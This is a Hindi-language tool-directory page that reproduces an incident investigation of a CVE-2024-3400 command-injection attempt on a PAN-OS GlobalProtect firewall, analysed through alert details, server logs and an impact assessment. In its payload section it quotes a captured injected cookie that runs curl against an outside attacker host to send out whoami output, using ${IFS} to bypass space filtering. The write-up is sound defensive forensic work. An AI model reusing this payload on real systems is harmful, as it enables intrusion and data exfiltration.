Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — PAN-OS CVE-2024-3400 कमांड इंजेक्शन प्रयास की जांच, जिसमें लॉग साक्ष्य के आधार पर पेलोड डिलीवरी, आंतरिक प्रोसेसिंग और निष्पादन सत्यापन का विश्लेषण किया गया है। | Kitploit
उपकरण/GitHubGitHub/zedocun/pan-os-cve-2024-3400-command-injection-investigation
भेद्यता विश्लेषणवेब सुरक्षाडिजिटल फोरेंसिकखतरा खुफियाघटना प्रतिक्रियालॉग विश्लेषण
GitHubzedocun/pan-os-cve-2024-3400-command-injection-investigation

PAN-OS-CVE-2024-3400-Command-Injection-Investigation

PAN-OS CVE-2024-3400 कमांड इंजेक्शन प्रयास की जांच, जिसमें लॉग साक्ष्य के आधार पर पेलोड डिलीवरी, आंतरिक प्रोसेसिंग और निष्पादन सत्यापन का विश्लेषण किया गया है।

रिपॉजिटरी देखें
124 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Read on Medium

PAN-OS CVE-2024-3400 कमांड इंजेक्शन प्रयास की जांच

अवलोकन

यह प्रोजेक्ट PAN-OS GlobalProtect सेवा को लक्षित करने वाले CVE-2024-3400 कमांड इंजेक्शन प्रयास की जांच का दस्तावेजीकरण करता है।

लक्ष्य यह निर्धारित करना था:

  • क्या यह वास्तविक हमला है
  • क्या कमांड निष्पादन हुआ
  • क्या सिस्टम से छेड़छाड़ के सबूत हैं

अलर्ट अवलोकन

एक गंभीर अलर्ट ट्रिगर हुआ जो संभावित शोषण प्रयास का संकेत देता है।

  • लक्ष्य: 172.16.17.139 (PA-Firewall-01)
  • स्रोत: 144.172.79.92
  • एंडपॉइंट: /global-protect/login.esp
  • विधि: POST
  • कार्रवाई: अनुमत

अलर्ट अवलोकन


दुर्भावनापूर्ण पेलोड

अनुरोध में एक क्राफ्टेड कुकी है:

SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

पेलोड

मुख्य अवलोकन

  • ${IFS} स्पेस फ़िल्टरिंग को बायपास करता है
  • whoami सिस्टम पहचान प्राप्त करने का प्रयास करता है
  • curl आउटबाउंड संचार का प्रयास करता है

यह एक कमांड इंजेक्शन पेलोड है


वेब सर्वर साक्ष्य

Nginx लॉग पुष्टि करते हैं कि अनुरोध सर्वर तक पहुंचा:

POST /global-protect/login.esp
HTTP 200
User-Agent: curl

Nginx लॉग

दुर्भावनापूर्ण अनुरोध स्वीकार और संसाधित किया गया।


आंतरिक प्रोसेसिंग

सिस्टम लॉग दिखाते हैं कि पेलोड आंतरिक लॉजिक तक पहुंचा:

प्रोसेसिंग लॉग

मुख्य निष्कर्ष

  • पेलोड आंतरिक कमांड (dt_curl) में एम्बेड किया गया था
  • आउटबाउंड अनुरोध का प्रयास किया गया
  • निष्पादन श्रृंखला आंतरिक घटकों तक पहुंची

हालांकि:

DNS लुकअप विफल → आउटबाउंड विफल


हमलावर इंफ्रास्ट्रक्चर

हमलावर आईपी:

  • 144.172.79.92
  • दुर्भावनापूर्ण के रूप में फ्लैग किया गया
  • होस्टिंग प्रदाता से संबद्ध

हमलावर आईपी

यह बाहरी हमलावर उत्पत्ति की पुष्टि करता है।


नेटवर्क टाइमलाइन

हमले से पहले कई आईपी ने सिस्टम के साथ इंटरैक्ट किया:

टाइमलाइन

केवल 144.172.79.92 सीधे शोषण से जुड़ा है।


प्रभाव आकलन

पुष्टि की गई

  • CVE-2024-3400 को लक्षित करने वाला शोषण प्रयास
  • दुर्भावनापूर्ण पेलोड वितरित किया गया
  • अनुरोध सर्वर द्वारा संसाधित किया गया
  • पेलोड आंतरिक प्रोसेसिंग तक पहुंचा
  • आउटबाउंड प्रयास ट्रिगर किया गया

पुष्टि नहीं हुई

  • OS कमांड निष्पादन
  • कमांड आउटपुट
  • डेटा एक्सफिल्ट्रेशन
  • रिवर्स शेल
  • पर्सिस्टेंस
  • लेटरल मूवमेंट

निष्कर्ष

यह एक वास्तविक कमांड इंजेक्शन प्रयास था।

हमलावर सफलतापूर्वक:

  • दुर्भावनापूर्ण अनुरोध वितरित किया
  • पेलोड इंजेक्ट किया
  • आंतरिक प्रोसेसिंग ट्रिगर की

हालांकि:

कोई पुष्टि किया गया निष्पादन या सिस्टम से छेड़छाड़ नहीं है


अंतिम वर्गीकरण

कमांड इंजेक्शन प्रयास
पेलोड संसाधित - कोई पुष्टि निष्पादन या प्रभाव नहीं

टूल डाउनलोड करें